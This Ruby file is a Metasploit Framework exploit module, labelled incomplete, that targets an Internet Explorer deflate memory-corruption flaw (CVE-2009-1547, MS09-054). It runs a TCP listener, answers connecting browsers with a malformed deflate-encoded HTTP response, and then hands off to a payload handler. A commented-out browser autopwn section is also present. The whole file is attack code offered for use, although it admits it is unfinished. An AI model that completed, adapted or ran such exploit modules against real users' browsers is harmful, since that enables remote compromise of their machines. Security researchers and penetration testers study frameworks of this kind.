##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote

	include Msf::Exploit::Remote::TcpServer

=begin
	#
	# BrowserAutopwn is no good for TcpServer modules. Must be HttpServer or dervied...
	#
	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:ua_name    => HttpClients::IE,
		:javascript => true,
		:os_name    => OperatingSystems::WINDOWS,
		:vuln_test  => nil, # no way to test without just trying it
		:rank       => NormalRanking  # reliable memory corruption
	})
=end

	def initialize(info = {})
		super(update_info(info,
			'Name'           => '[INCOMPLETE] Microsoft Internet Explorer Deflate Memory Corruption',
			'Description'    => %q{
				This module exploits a vulnerability in the deflate processing code
			of Internet Explorer.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'hdm'
				],
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2009-1547'],
					['MSB', 'MS09-054'],

				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00",
					'Compat'   =>
						{
							'ConnectionType' => '-find',
						},
					'StackAdjustment' => -3500
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { }],
				],
			'DisclosureDate' => 'Nov 10 2009',
			'DefaultTarget'  => 0))

		register_options([
			OptPort.new('SRVPORT', [true, 'The listening HTTP service port', 8090])
		], self.class)
	end

	def on_client_data(cli)
		req = cli.get_once(-1, 5)

		print_status("Sending exploit HTML to #{cli.peerhost}:#{cli.peerport}...")
		cli.put("HTTP \nContent-Encoding:deflate\nContent-Range:\n\n")
		cli.close
		handler(cli)
	end
end

